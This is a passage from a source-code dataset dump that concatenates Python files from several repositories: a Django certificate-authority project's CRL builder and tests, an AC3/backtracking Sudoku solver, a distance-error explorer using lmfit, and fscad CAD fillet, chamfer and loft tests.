if issuer_cert.get_subject().L:
name_attrs.append(
x509.NameAttribute(
x509.oid.NameOID.LOCALITY_NAME,
issuer_cert.get_subject().L
)
)
if issuer_cert.get_subject().O:
name_attrs.append(
x509.NameAttribute(
x509.oid.NameOID.ORGANIZATION_NAME,
issuer_cert.get_subject().O
)
)
if issuer_cert.get_subject().OU:
name_attrs.append(
x509.NameAttribute(
x509.oid.NameOID.ORGANIZATIONAL_UNIT_NAME,
issuer_cert.get_subject().OU
)
)
builder = builder.issuer_name(x509.Name(name_attrs))
builder = builder.last_update(datetime.utcnow())
builder = builder.next_update(datetime.utcnow() + timedelta(days=days))
for serial, date, reason in revoked_list:
ext = x509.CRLReason(x509.ReasonFlags(reason))
revoked_cert = x509.RevokedCertificateBuilder(
).serial_number(
serial
).revocation_date(
date
).add_extension(
ext, False
).build(default_backend())
builder = builder.add_revoked_certificate(revoked_cert)
# To add the AKI extension, we have to read the SKI extension from the
# signing certificate
ski = get_certificate_extension(issuer_cert, b'subjectKeyIdentifier')
if ski:
ski = bytes.fromhex(str(ski).replace(':', '').lower())
ext = x509.AuthorityKeyIdentifier(ski, None, None)
builder = builder.add_extension(ext, False)
# Add CRL Number
ext = x509.CRLNumber(number)
builder = builder.add_extension(ext, False)
# Add Delta CRL Number
# if is_delta:
# if number >= delta_number:
# raise ValueError('delta_number')
# ext = x509.DeltaCRLIndicator(delta_number)
# builder = builder.add_extension(ext, False)
# FUTURE: Add Freshest CRL. Cryptography doesn't support building
# CRLs with this extension so we can't create Delta CRLs right now
# if not is_delta and crl_locations:
# url = crl_locations[0]
# point = x509.DistributionPoint(
# full_name=[x509.DNSName(url)],
# relative_name=None,
# reasons=None,
# crl_issuer=None,
# )
# ext = x509.FreshestCRL(distribution_points=[point])
# builder = builder.add_extension(ext, False)
# FUTURE: add Issuing Distribution Point
# This extension is not supported by criptography either
# https://tools.ietf.org/html/rfc5280#section-5.2.5
# Although the extension is critical, conforming implementations
# are not required to support this extension.
# However, implementations that do not support this extension
# MUST either treat the status of any certificate not listed
# on this CRL as unknown or locate another CRL that does not
# contain any unrecognized critical extensions.
crl = builder.sign(
issuer_key.to_cryptography_key(),
hashes.SHA256(),
default_backend(),
)
openssl_crl = crypto.CRL.from_cryptography(crl)
return openssl_crl
```
#### File: webca/crypto/tests.py
```python
from datetime import datetime, timedelta
import pytz
from cryptography import x509
from django.test import TestCase
from OpenSSL import crypto
from . import constants as c
from . import certs, crl, utils
from .exceptions import CryptoException
class KeyPair(TestCase):
"""create_key_pair"""
def test_key_pair(self):
"""Test that we get what we asked for."""
key_pair = certs.create_key_pair(c.KEY_RSA, 512)
self.assertIsInstance(key_pair, crypto.PKey)
self.assertEqual(key_pair.bits(), 512)
self.assertEqual(key_pair.type(), crypto.TYPE_RSA)
key_pair = certs.create_key_pair(c.KEY_DSA, 512)
self.assertIsInstance(key_pair, crypto.PKey)
self.assertEqual(key_pair.bits(), 512)
self.assertEqual(key_pair.type(), crypto.TYPE_DSA)
def test_key_type(self):
"""Test correct args."""
self.assertRaises(ValueError,
certs.create_key_pair, key_type=c.KEY_EC, bits=512)
self.assertRaises(ValueError,
certs.create_key_pair, key_type=-1, bits=512)
self.assertRaises(ValueError,
certs.create_key_pair, key_type=4, bits=512)
self.assertRaises(ValueError,
certs.create_key_pair, key_type='1', bits=512)
def test_bits(self):
"""Test correct args."""
self.assertRaises(ValueError,
certs.create_key_pair, key_type=c.KEY_RSA, bits=-1)
class Request(TestCase):
"""create_cert_request"""
def test_request(self):
"""Test correct type."""
keys = certs.create_key_pair(c.KEY_RSA, 512)
name = [
('CN', 'test'),
('C', 'ES'),
('ST', 'test'),
('L', 'test'),
('O', 'test'),
('OU', 'test'),
('emailAddress', '<EMAIL>'),
]
request = certs.create_cert_request(keys, name)
self.assertIsInstance(request, crypto.X509Req)
def test_signing(self):
"""Test signing key."""
skey = certs.create_key_pair(c.KEY_RSA, 512)
name = [('CN', 'test'),]
keys = certs.create_key_pair(c.KEY_RSA, 512)
request = certs.create_cert_request(keys, name, signing_key=skey)
self.assertTrue(request.verify(skey))
def test_extensions(self):
"""Test extensions."""
name = [('CN', 'test'),]
keys = certs.create_key_pair(c.KEY_RSA, 512)
request = certs.create_cert_request(keys, name)
self.assertEqual(request.get_extensions(), [])
exts = [
crypto.X509Extension(b'basicConstraints', True, b'CA:FALSE')
]
request = certs.create_cert_request(keys, name, exts)
self.assertEqual(len(request.get_extensions()), 1)
class Certificate(TestCase):
"""create_certificate"""
def build_certificate(self, name=None, add_exts=False):
name = name or [
('CN', 'test'),
('C', 'ES'),
('ST', 'test'),
('L', 'test'),
('O', 'test'),
('OU', 'test'),
('emailAddress', '<EMAIL>'),
]
keys = certs.create_key_pair(c.KEY_RSA, 512)
if add_exts:
exts = [
crypto.X509Extension(b'basicConstraints', True, b'CA:FALSE')
]
else:
exts = []
req = certs.create_cert_request(keys, name, exts)
cert = certs.create_certificate(req, (req, keys), 1, (0, 3600))
return keys, req, cert
def build_certificate2(self, **kwargs):
name = [
('CN', 'test2'),
('C', 'ES'),
('ST', 'test2'),
('L', 'test2'),
('O', 'test2'),
('OU', 'test2'),
('emailAddress', '<EMAIL>'),
]
return self.build_certificate(name, **kwargs)
def test_certificate(self):
"""Test correct type."""
keys, req, cert = self.build_certificate()
self.assertIsInstance(cert, crypto.X509)
def test_serial(self):
"""Test serial."""
keys, req, cert = self.build_certificate()
self.assertEqual(cert.get_serial_number(), 1)
def test_subject(self):
"""Test serial."""
keys, req, cert = self.build_certificate()
self.assertEqual(cert.get_subject().CN, 'test')
self.assertEqual(cert.get_subject().C, 'ES')
self.assertEqual(cert.get_subject().ST, 'test')
self.assertEqual(cert.get_subject().L, 'test')
self.assertEqual(cert.get_subject().O, 'test')
self.assertEqual(cert.get_subject().OU, 'test')
self.assertEqual(cert.get_subject().emailAddress, '<EMAIL>')
def test_pubkey(self):
"""Test pubkey."""
keys, req, cert = self.build_certificate()
pem1 = crypto.dump_publickey(crypto.FILETYPE_PEM, req.get_pubkey())
pem2 = crypto.dump_publickey(crypto.FILETYPE_PEM, cert.get_pubkey())
self.assertEqual(pem1, pem2)
def test_issuer_name_self(self):
"""issuer name on self signed certs"""
keys, req, cert = self.build_certificate()
self.assertEqual(req.get_subject(), cert.get_subject())
def test_issuer_name(self):
"""issuer name"""
keys, req, cert = self.build_certificate()
keys2, req2, cert2 = self.build_certificate2()
certificate = certs.create_certificate(req, (cert2, keys2), 1, (0, 10))
self.assertEqual(certificate.get_issuer(), req2.get_subject())
def test_issuer_keyid(self):
"""issuer name"""
keys, req, cert = self.build_certificate()
keys2, req2, cert2 = self.build_certificate2()
exts = dict()
for i in range(0, cert2.get_extension_count()):
exts[cert2.get_extension(i).get_short_name()] = cert2.get_extension(i)
ca_ski = exts[b'subjectKeyIdentifier']
certificate = certs.create_certificate(req, (cert2, keys2), 1, (0, 10))
exts = dict()
for i in range(0, certificate.get_extension_count()):
exts[certificate.get_extension(i).get_short_name()] = certificate.get_extension(i)
aki = exts[b'authorityKeyIdentifier']
self.assertTrue(str(ca_ski) in str(aki))
def test_issuer_signature(self):
"""issuer name"""
keys, req, cert = self.build_certificate()
keys2, req2, cert2 = self.build_certificate2()
certificate = certs.create_certificate(req, (cert2, keys2), 1, (0, 10))
self.assertIsNone(crypto.verify(
cert2,
certificate.to_cryptography().signature,
certificate.to_cryptography().tbs_certificate_bytes,
"sha256",
))
def test_extensions(self):
"""Cert without declared extensions."""
keys, req, cert = self.build_certificate(add_exts=False)
# On an issued certificate, there's always authorityKeyIdentifier + subjectKeyIdentifier
self.assertEqual(cert.get_extension_count(), 2)
def test_extensions_extra(self):
"""Cert with an extra extension."""
keys, req, cert = self.build_certificate(add_exts=True)
# On an issued certificate, there's always authorityKeyIdentifier + subjectKeyIdentifier
self.assertEqual(cert.get_extension_count(), 3)
def test_validity(self):
"""Check the validity is the asked for."""
keys, req, cert = self.build_certificate()
now = datetime.now(pytz.utc) + timedelta(hours=1)
self.assertGreater(now, utils.asn1_to_datetime(cert.get_notBefore()))
self.assertLess(utils.asn1_to_datetime(cert.get_notAfter()), now)
def test_validity_ca(self):
"""Check against CA validity."""
keys, req, cert = self.build_certificate()
keys2, req2, cert2 = self.build_certificate()
self.assertRaises(
CryptoException,
certs.create_certificate,
req, (cert2, keys2), 1, (-10, 4000),
)
self.assertRaises(
CryptoException,
certs.create_certificate,
req, (cert2, keys2), 1, (0, 4000),
)
class SelfSignedCertificate(TestCase):
"""create_self_signed"""
def test_name(self):
"""Test the name and issuer."""
name = [
('CN', 'test'),
('C', 'ES'),
('ST', 'test'),
('L', 'test'),
('O', 'test'),
('OU', 'test'),
('emailAddress', '<EMAIL>'),
]
key, cert = certs.create_self_signed(name)
self.assertEqual(cert.get_subject(), cert.get_issuer())
class CACertificate(TestCase):
"""create_ca_certificate"""
name = [
('CN', 'test'),
('C', 'ES'),
('ST', 'test'),
('L', 'test'),
('O', 'test'),
('OU', 'test'),
('emailAddress', '<EMAIL>'),
]
def test_create(self):
"""Test the name and issuer."""
key, cert = certs.create_ca_certificate(self.name)
self.assertEqual(cert.get_subject(), cert.get_issuer())
def test_basic_constraints(self):
"""Test basicConstraints"""
key, cert = certs.create_ca_certificate(self.name)
ext = cert.get_extension(0)
self.assertEqual(ext.get_short_name(), b'basicConstraints')
self.assertTrue(ext.get_critical())
self.assertEqual(ext.get_data(), b'0\x03\x01\x01\xff')
def test_key_usage(self):
"""Test keyUsage"""
key, cert = certs.create_ca_certificate(self.name)
ext = cert.get_extension(1)
self.assertEqual(ext.get_short_name(), b'keyUsage')
self.assertTrue(ext.get_critical())
self.assertEqual(ext.get_data(), b'\x03\x02\x01\x06')
def test_pathlen(self):
"""Test pathlen"""
key, cert = certs.create_ca_certificate(self.name, pathlen=2)
ext = cert.get_extension(0)
self.assertEqual(ext.get_short_name(), b'basicConstraints')
self.assertTrue(ext.get_critical())
self.assertEqual(ext.get_data(), b'0\x06\x01\x01\xff\x02\x01\x02') # last byte
class CRL(TestCase):
"""Test CRL creation"""
revoked = [
(1, datetime.now(pytz.utc), x509.ReasonFlags.unspecified),
]
name = [
('CN', 'test'),
('C', 'ES'),
('ST', 'test'),
('L', 'test'),
('O', 'test'),
('OU', 'test'),
]
def test_creation(self):
"""Test CRL creation."""
ca_key, ca_cert = certs.create_ca_certificate(self.name, bits=512)
ca_crl = crl.create_crl(self.revoked, 15, (ca_cert, ca_key), 1)
self.assertIsInstance(ca_crl, crypto.CRL)
def test_issuer(self):
"""Test CRL issuer."""
ca_key, ca_cert = certs.create_ca_certificate(self.name, bits=512)
ca_crl = crl.create_crl(self.revoked, 15, (ca_cert, ca_key), 1)
self.assertEqual(ca_crl.get_issuer(), ca_cert.get_issuer())
def test_revoked(self):
"""Test CRL issuer."""
ca_key, ca_cert = certs.create_ca_certificate(self.name, bits=512)
ca_crl = crl.create_crl(self.revoked, 15, (ca_cert, ca_key), 1)
self.assertEqual(len(ca_crl.get_revoked()), 1)
def test_revoked_empty(self):
"""Test CRL issuer."""
ca_key, ca_cert = certs.create_ca_certificate(self.name, bits=512)
ca_crl = crl.create_crl([], 15, (ca_cert, ca_key), 1)
self.assertIsNone(ca_crl.get_revoked())
def test_signature(self):
"""Test CRL issuer."""
ca_key, ca_cert = certs.create_ca_certificate(self.name, bits=512)
ca_crl = crl.create_crl([], 15, (ca_cert, ca_key), 1)
self.assertIsNone(crypto.verify(
ca_cert,
ca_crl.to_cryptography().signature,
ca_crl.to_cryptography().tbs_certlist_bytes,
"sha256",
))
```
#### File: webca/utils/fields.py
```python
from django import forms
from django.contrib.humanize.templatetags.humanize import apnumber
from django.core.exceptions import ValidationError
from django.db import models
from django.template.defaultfilters import pluralize
from django.utils.text import capfirst
class MultiSelectFormField(forms.MultipleChoiceField):
"""Multi select checkbox form field with max_choices option."""
widget = forms.CheckboxSelectMultiple
def __init__(self, *args, **kwargs):
self.max_choices = kwargs.pop('max_choices', 0)
super(MultiSelectFormField, self).__init__(*args, **kwargs)
def clean(self, value):
if not value and self.required:
raise forms.ValidationError(self.error_messages['required'])
if value and self.max_choices and len(value) > self.max_choices:
raise forms.ValidationError(
'You must select a maximum of %s choice%s.'
% (
apnumber(self.max_choices),
pluralize(self.max_choices)))
return value
class MultiSelectField(models.CharField):
"""
Multiselection field that stores choices in a comma separated list.
"""
# __metaclass__ = models.SubfieldBase
description = "Multiselection field."
def __init__(self, *args, **kwargs):
self.max_choices = kwargs.pop('max_choices', 0)
super().__init__(*args, **kwargs)
def deconstruct(self):
"""Deconstruct for serializers.
For any configuration of your Field instance,
deconstruct() must return arguments that you can pass to __init__
to reconstruct that state.
"""
name, path, args, kwargs = super().deconstruct()
return name, path, args, kwargs
def to_python(self, value):
"""
to_python() is called by deserialization and during the clean()
method used from forms.
"""
if isinstance(value, list):
return value
if value is None:
return value
return value.split(',')
def from_db_value(self, value, expression, connection):
"""
from_db_value() will be called in all circumstances when the data is loaded
from the database, including in aggregates and values() calls.
"""
if value is None:
return value
return value.split(',')
def get_prep_value(self, value):
"""
Override get_prep_value() to convert Python objects back to query values.
"""
if isinstance(value, str):
return value
elif isinstance(value, list):
return ",".join(value)
return None
def formfield(self, **kwargs):
"""
Returns the default django.forms.Field of this field for ModelForm.
"""
# don't call super, as that overrides default widget if it has choices
defaults = {
# 'required': not self.blank,
'required': not self.blank,
'label': capfirst(self.verbose_name),
'help_text': self.help_text,
'choices': self.choices,
'max_choices': self.max_choices,
}
if self.has_default():
defaults['initial'] = self.get_default()
defaults.update(kwargs)
return MultiSelectFormField(**defaults)
def get_internal_type(self):
return "CharField"
def value_to_string(self, obj):
value = self.value_from_object(obj)
return self.get_prep_value(value)
def validate(self, value, model_instance):
# All possible choices
arr_choices = self.get_choices_selected(self.get_choices_default())
for opt_select in value:
if opt_select not in arr_choices:
raise ValidationError(
self.error_messages['invalid_choice'] % value)
return
def get_choices_default(self):
"""Get the choices for this field."""
return self.get_choices(include_blank=False)
def get_choices_selected(self, arr_choices=''):
"""Get the values of the choices."""
if not arr_choices:
return False
selected = []
for choice_selected in arr_choices:
selected.append(choice_selected[0])
return selected
"""
def get_FIELD_display(self, field):
value = getattr(self, field.attname)
choicedict = dict(field.choices)
def contribute_to_class(self, cls, name):
super(MultiSelectField, self).contribute_to_class(cls, name)
if self.choices:
func = lambda self, fieldname = name, choicedict = dict(self.choices): ",".join(
[choicedict.get(value, value) for value in getattr(self, fieldname)])
setattr(cls, 'get_%s_display' % self.name, func)
"""
```
#### File: webca/web/signals.py
```python
from django.contrib.auth.models import User
from django.db.models.signals import post_save, pre_save
from django.dispatch import receiver
from webca.web.models import CAUser
@receiver(post_save, sender=User)
def save_ca_user(sender, instance, **kwargs):
"""Save the instance of CAUser."""
try:
instance.ca_user
except CAUser.DoesNotExist:
CAUser.objects.create(user=instance)
instance.ca_user.save()
```
#### File: web/templatetags/webca.py
```python
from datetime import timedelta
from django import template
from django.utils import timezone
from django.utils.safestring import SafeText
from webca.crypto.utils import components_to_name, int_to_hex
from webca.utils import subject_display
register = template.Library()
@register.filter
def required(value): # Only one argument.
"""Add the required attribute to an input element."""
html = str(value)
if html and html.startswith('<input '):
html = html.replace('<input ', '<input required ')
return SafeText(html)
@register.filter
def approval(value):
"""Return the approval status of a request."""
if value is None:
return 'Pending'
if value:
return 'Approved'
return 'Denied'
@register.filter
def valid_for(days):
"""Return a text saying for how many days
the certificate is valid for or years if it spans over years."""
delta = timedelta(days=days)
value = ''
if delta.days / 365 > 1:
value += '%d years' % (delta.days / 365)
else:
value += '%d days' % delta.days
return value
@register.filter
def valid_until(days):
"""Return a date that is `days` in the future."""
future = timezone.now() + timedelta(days=days)
return future
@register.filter
def status(cert):
"""Return a string with the status of the certificate."""
value = 'Valid'
if cert.is_revoked:
value = 'Revoked'
elif cert.is_expired:
value = 'Expired'
return value
@register.filter
def subject(x509):
"""Return the subject of the certificate."""
value = components_to_name(x509.get_subject().get_components())
return subject_display(value).replace('/', ' ').strip()
```
|
{
"source": "Jesusfreakster1/Python-AC3-Backtracking-CSP-Sudoku-Solver",
"score": 4
}
|
#### File: Jesusfreakster1/Python-AC3-Backtracking-CSP-Sudoku-Solver/backtrack.py
```python
from Utility import selectMostConstrainedVariable, orderDomainValues, isConsistent, assign, unassign
#Supposes assignments, and then backtracks and tries again through the possibilities
#Uses recursion to test all possibilities until a solution is found or all possibilities have been tried and none exists
def backtrackRecursion(assignment, sudoku):
#If the assignment is the same size as the sudoku, we know we have solved it and can return the result
if len(assignment) == len(sudoku.cells):
return assignment
#Decide what variable to work with (MRV)
cell = selectMostConstrainedVariable(assignment, sudoku)
#Pick an assignement that causes the least conflicts...
for value in orderDomainValues(sudoku, cell):
#...If there are no conflicts with this assignment, then...
if isConsistent(sudoku, assignment, cell, value):
#...Add this assignment supposition to our proposed solution...
assign(sudoku, cell, value, assignment)
#...and keep going to until we find a solution.
result = backtrackRecursion(assignment, sudoku)
#...If continuing forward finds a solution, we return the assignment of that solution
if result:
return result
#...If we find the current assignment does conflict with something, we undo it and try to pick another
unassign(sudoku, cell, assignment)
#If we made it here, that means we...
#-went through all possible values for the curent cell
#-continued through the algorithm to the end of all the possibilities of every cell from then on by calling recursively
#-and STILL coulnd't find a solution, therefore it doesn't exist, so return failure
return False
```
#### File: Jesusfreakster1/Python-AC3-Backtracking-CSP-Sudoku-Solver/Sudoku_solver.py
```python
import sys
from AC3 import AC3, removeInconsistentValues
from backtrack import backtrackRecursion
import Utility
import re
import itertools
rows = "123456789"
cols = "ABCDEFGHI"
#Set up the Sudoku grid from the string
class Sudoku:
def __init__(self, grid):
game = list(grid)
#Generates all the coordinates to designate each cell in the grid
self.cells = list()
self.cells = self.generateCoords()
#Creates the possibilities 1-9 for every cell, unless its already been given
self.possibilities = dict()
self.possibilities = self.generatePossibilities(grid)
#Generates the constraints for rows, columns, and 3x3 subgrids
ruleConstraints = self.generateRulesConstraints()
#Takes the above constraints and createst the binary relations between cells as nodes
self.binaryConstraints = list()
self.binaryConstraints = self.GenerateBinaryConstraints(ruleConstraints)
#Generates the relationship between each node
self.relatedCells = dict()
self.relatedCells = self.generateRelatedCells()
#Generates the list of values that have been pruned out by forward checking
self.pruned = dict()
self.pruned = {v: list() if grid[i] == '0' else [int(grid[i])] for i, v in enumerate(self.cells)}
#Generates the coordinate grid for the all the cells
def generateCoords(self):
allCellsCoords = []
#for A,B,C, ... ,H,I
for col in cols:
#for 1,2,3 ,... ,8,9
for row in rows:
#A1, A2, A3, ... , H8, H9
newCoords = col + row
allCellsCoords.append(newCoords)
return allCellsCoords
#Generates the possibilites 1-9 for undetermined cells and slots the given values for given cells at the start
def generatePossibilities(self, grid):
gridList = list(grid)
possibilities = dict()
for index, coords in enumerate(self.cells):
#if value is 0, then the cell can have any value in [1, 9]
if gridList[index] == "0":
possibilities[coords] = list(range(1, 10))
#else value is already defined, possibilities is this value
else:
possibilities[coords] = [int(gridList[index])]
return possibilities
#Makes constraints based upon the rules of Sudoku
def generateRulesConstraints(self):
rowConstraints = []
columnConstraints = []
squareConstraints = []
#Rows constraints
for row in rows:
rowConstraints.append([col + row for col in cols])
#Columns constraints
for col in cols:
columnConstraints.append([col + row for row in rows])
#3x3 square constraints
rowsSquareCoords = (cols[i:i + 3] for i in range(0, len(rows), 3))
rowsSquareCoords = list(rowsSquareCoords)
colsSquareCoords = (rows[i:i + 3] for i in range(0, len(cols), 3))
colsSquareCoords = list(colsSquareCoords)
#Apply the constraints to each cell...
for row in rowsSquareCoords:
for col in colsSquareCoords:
currentSquareConstraints = []
#...And each value in it
for x in row:
for y in col:
currentSquareConstraints.append(x + y)
squareConstraints.append(currentSquareConstraints)
#All of the constraints is the sum of the three rules
return rowConstraints + columnConstraints + squareConstraints
#Creates the binary constraints from the rule constraints
def GenerateBinaryConstraints(self, ruleConstraints):
generatedBinaryConstraints = list()
#Create binary constraints for each set of constraints based on the rules
for constraintSet in ruleConstraints:
binaryConstraints = list()
#2 because we want binary constraints
for binaryConstraint in itertools.permutations(constraintSet, 2):
binaryConstraints.append(binaryConstraint)
#For every binary constraint...
for constraint in binaryConstraints:
#Make sure it is unique/doesn't already exist
constraintList = list(constraint)
if (constraintList not in generatedBinaryConstraints):
generatedBinaryConstraints.append([constraint[0], constraint[1]])
return generatedBinaryConstraints
#Creates what cells are related to one another
def generateRelatedCells(self):
relatedCells = dict()
#for each one of the 81 cells
for cell in self.cells:
relatedCells[cell] = list()
#related cells are the ones that current cell has constraints with
for constraint in self.binaryConstraints:
if cell == constraint[0]:
relatedCells[cell].append(constraint[1])
return relatedCells
#Determines if the Sudoku is solved or not by iterating through each cell and making sure there is only one possibility for it
def isFinished(self):
for coords, possibilities in self.possibilities.items():
if len(possibilities) > 1:
return False
return True
#Generates a easy to read string based on a Sudoku
def __str__(self):
output = ""
count = 1
#For each cell...
for cell in self.cells:
#...Print its value
value = str(self.possibilities[cell])
if type(self.possibilities[cell]) == list:
value = str(self.possibilities[cell][0])
output += "[" + value + "]"
#Makes a newline at the end of a row
if count >= 9:
count = 0
output += "\n"
count += 1
return output
#Solves a Sudoku via AC3 and returns true if complete, and false if impossible
def solveAC3(grid):
print("AC3 starting")
#Make the Sudoku based on the provided input grid
sudoku = Sudoku(grid)
#Launch AC-3 algorithm of the Sudoku
AC3SolutionExists = AC3(sudoku)
#Sudoku has no solution
if not AC3SolutionExists:
print("this Sudoku has no solution")
else:
#If AC3 worked print the solution
if sudoku.isFinished():
print("Solution complete.")
print("Result: \n{}".format(sudoku))
#If AC3 didn't work, we need to backtrack
else:
print("Backtracking to find solution...")
assignment = {}
#Set the values we already know
for cell in sudoku.cells:
if len(sudoku.possibilities[cell]) == 1:
assignment[cell] = sudoku.possibilities[cell][0]
#Then start backtraing
assignment = backtrackRecursion(assignment, sudoku)
#merge the computed values for the cells at one place
for cell in sudoku.possibilities:
sudoku.possibilities[cell] = assignment[cell] if len(cell) > 1 else sudoku.possibilities[cell]
if assignment:
print("Result: \n{}".format(sudoku))
else:
print("No solution exists")
if __name__ == "__main__":
selection = 0
selection = int(input("Please input a 1 to input the Sudoku manually, or input a 2 to read it from a .txt file\n"))
sudoku = ""
while selection != 1 and selection != 2:
selection = int(input("Input not recognized, please input a 1 or a 2\n"))
if selection == 1:
sudoku = str(input("Type the Sudoku as a 81 character string that goes across each row, use a 0 as a blank cell\n"))
if len(sudoku) != 81 or not sudoku.isdecimal():
print("Sudoku is of improper form, exiting")
exit(1)
if selection == 2:
filename = str(input("Type the filename without the file extension\n"))
filename = filename + ".txt"
file = open(filename, "r")
with open(filename, "r") as file:
while True:
fileChar = file.read()
sudoku = sudoku + fileChar
if fileChar == '':
#Debug: print("EOF")
break
#Debug: print(sudoku)
sudoku = sudoku.replace(" ", "")
sudoku = sudoku.replace('\n', "")
sudoku = sudoku.replace('\r', "")
sudoku = sudoku.replace('\r\n', "")
sudoku = sudoku.replace(',', "")
sudoku = sudoku.replace('[', "")
sudoku = sudoku.replace(']', "")
#Debug: print(sudoku)
if len(sudoku) != 81 or not sudoku.isdecimal():
print("Sudoku is of improper form, exiting")
exit(1)
selection = int(input("Please input a 1 to solve via AC3, or input a 2 to solve via forward checking\n"))
while selection != 1 and selection != 2:
selection = int(input("Input not recognized, please input a 1 or a 2\n"))
if selection == 1:
solveAC3(sudoku)
if selection == 2:
solveForwardChecking(sudoku)
```
|
{
"source": "JesusFreke/edist",
"score": 3
}
|
#### File: JesusFreke/edist/explorer.py
```python
import lmfit
import numpy
class TooManyIterationsException(Exception):
pass
class Explorer(object):
"""This class tries to "explore" the local minima of the error function.
The error function is the sum of square of distance errors for known distances.
Given an initial location near a local minima, it will attempt to descend the minima, and then evaluate all points on
a grid of a fixed size (currently hard-coded to 1/32) in and around that local minima.
"""
def __init__(self, connections, limit):
self.values = {}
self.connections = connections
self.correct_locations = []
self.limit = limit
def explore(self, location):
"""Explore the local minima near location.
This calculates the error function for all grid-aligned locations in and around the volume where error=0.
Afterwards, the correct_locations field will be populated with all the grid-aligned locations where error=0.
Raises:
TooManyIterationsException: if more than [limit] (from the constructor) locations are calculated
"""
self.generic_explore(location,
lambda location: self.explore_plane(location),
lambda params: self.objective(params),
3,
False)
def minimize(self, initial_guess, objective, dimensions):
params = lmfit.Parameters()
params.add('x', value=initial_guess[0], vary=True)
params.add('y', value=initial_guess[1], vary=False)
params.add('z', value=initial_guess[2], vary=False)
if dimensions > 1:
params['y'].vary = True
if dimensions > 2:
params['z'].vary = True
estimation = lmfit.minimize(objective, params)
if estimation.success:
return numpy.array([estimation.params['x'].value,
estimation.params['y'].value,
estimation.params['z'].value])
return None
def objective(self, params, x=None, y=None, z=None):
"""An objective function for use with lmfit's minimize function."""
if x is None:
x = params['x'].value
if y is None:
y = params['y'].value
if z is None:
z = params['z'].value
guess = numpy.array([x, y, z])
error = []
for name, other_location, expected_distance in self.connections:
error.append(self.calculate_single_error(guess, other_location, expected_distance) ** 2)
return error
def generic_explore(self, location, explore_func, objective_func, dimensions, exit_early=True):
if self.get_error(location) != 0:
minimum_location = self.minimize(location, objective_func, dimensions)
minimum_value = self.get_error(minimum_location)
if minimum_value > .001 and exit_early:
return False
else:
minimum_location = location
initial_location = numpy.rint(minimum_location * 32) / 32
next_location = initial_location
explore_func(next_location)
vector = numpy.array([0, 0, 0], float)
vector[dimensions-1] = 1/32.0
next_location = next_location + vector
while explore_func(next_location):
next_location = next_location + vector
next_location = initial_location - vector
while explore_func(next_location):
next_location = next_location - vector
return True
def explore_line(self, location):
return self.generic_explore(location,
lambda location: self.get_error(location) < .0001,
lambda params: self.objective(params, y=location[1], z=location[2]),
1)
def explore_plane(self, location):
return self.generic_explore(location,
lambda location: self.explore_line(location),
lambda params: self.objective(params, z=location[2]),
2)
def get_error(self, location):
"""Gets the error value at the given location."""
location_tuple = tuple(location)
value = self.values.get(location_tuple)
if value is not None:
return value
else:
value = self.calculate_error(location)
self.values[location_tuple] = value
if len(self.values) > self.limit:
raise TooManyIterationsException()
return value
def calculate_single_error(self, location, other_location, expected_distance):
"""Calculates the raw error for a single known distance."""
# First, calculate the distance using 32-bit floats, to match the calculation used by the game
float32_distance = numpy.linalg.norm((location - other_location).astype(numpy.float32))
if round(float32_distance, 2) == expected_distance:
return 0
# Now, recalculate the distance using 64-bit floats to get a smoother function, which
# works better with lmfit's minimizer
actual_distance = numpy.linalg.norm(location - other_location)
return actual_distance - expected_distance
def calculate_error(self, location):
"""Calculates the square of the distance errors for the given location."""
error = 0
for (name, other_location, expected_distance) in self.connections:
error += self.calculate_single_error(location, other_location, expected_distance) ** 2
# This shouldn't get called for the same location twice, since we're memoizing the results in Explorer.get_error
if error == 0 and is_grid_aligned(location):
self.correct_locations.append(location)
return error
def is_grid_aligned(location):
return numpy.array_equal(location, numpy.rint(location * 32) / 32)
```
|
{
"source": "JesusFreke/fscad",
"score": 2
}
|
#### File: fscad/tests/fillet_chamfer_test.py
```python
import adsk.fusion
from adsk.core import Vector3D
import math
import unittest
# note: load_tests is required for the "pattern" test filtering functionality in loadTestsFromModule in run()
from fscad.test_utils import FscadTestCase, load_tests
from fscad.fscad import *
class FilletChamferTest(FscadTestCase):
def test_basic_fillet(self):
box = Box(1, 1, 1)
fillet = Fillet(box.shared_edges(box.front, box.left), .25)
fillet.create_occurrence(True)
def test_two_edge_fillet(self):
box = Box(1, 1, 1)
fillet = Fillet(box.shared_edges(box.front, [box.left, box.right]), .25)
fillet.create_occurrence(True)
def test_two_body_fillet(self):
rect = Rect(1, 1)
rect2 = rect.copy()
rect2.tx(2)
extrude = Extrude(Union(rect, rect2), 1)
fillet = Fillet(extrude.shared_edges(extrude.end_faces, extrude.side_faces), .25)
fillet.create_occurrence(True)
def test_smooth_fillet(self):
box = Box(1, 1, 1)
fillet = Fillet(box.shared_edges([box.front, box.top, box.left], [box.front, box.top, box.left]), .25, True)
fillet.create_occurrence(True)
def test_basic_chamfer(self):
box = Box(1, 1, 1)
chamfer = Chamfer(box.shared_edges(box.front, box.left), .25)
chamfer.create_occurrence(True)
def test_two_edge_chamfer(self):
box = Box(1, 1, 1)
chamfer = Chamfer(box.shared_edges(box.front, [box.left, box.right]), .25)
chamfer.create_occurrence(True)
def test_two_body_chamfer(self):
rect = Rect(1, 1)
rect2 = rect.copy()
rect2.tx(2)
extrude = Extrude(Union(rect, rect2), 1)
chamfer = Chamfer(extrude.shared_edges(extrude.end_faces, extrude.side_faces), .25)
chamfer.create_occurrence(True)
def test_uneven_chamfer(self):
box = Box(1, 1, 1)
chamfer = Chamfer(box.shared_edges(box.front, box.left), .25, .5)
chamfer.create_occurrence(True)
def test_chamfered_faces(self):
box = Box(1, 1, 1)
chamfer = Chamfer(box.shared_edges(box.top, [box.left, box.right, box.front, box.back]), .25)
chamfer.create_occurrence(True)
self.assertEqual(len(chamfer.chamfered_faces), 4)
for face in chamfer.chamfered_faces:
self.assertEqual(
math.degrees(face.get_plane().normal.angleTo(Vector3D.create(0, 0, 1))),
45)
def run(context):
import sys
test_suite = unittest.defaultTestLoader.loadTestsFromModule(sys.modules[__name__])
unittest.TextTestRunner(failfast=True).run(test_suite)
```
#### File: fscad/tests/loft_test.py
```python
import adsk.fusion
import math
import unittest
# note: load_tests is required for the "pattern" test filtering functionality in loadTestsFromModule in run()
from fscad.test_utils import FscadTestCase, load_tests
from fscad.fscad import *
class LoftTest(FscadTestCase):
def test_basic_loft(self):
rect = Rect(1, 1)
circle = Circle(1)
circle.place(~circle == ~rect,
~circle == ~rect,
(~circle == ~rect) + 1)
loft = Loft(rect, circle)
loft.create_occurrence(True)
self.assertEqual(loft.bottom.brep.pointOnFace.z, 0)
self.assertTrue(math.isclose(loft.top.brep.pointOnFace.z, 1))
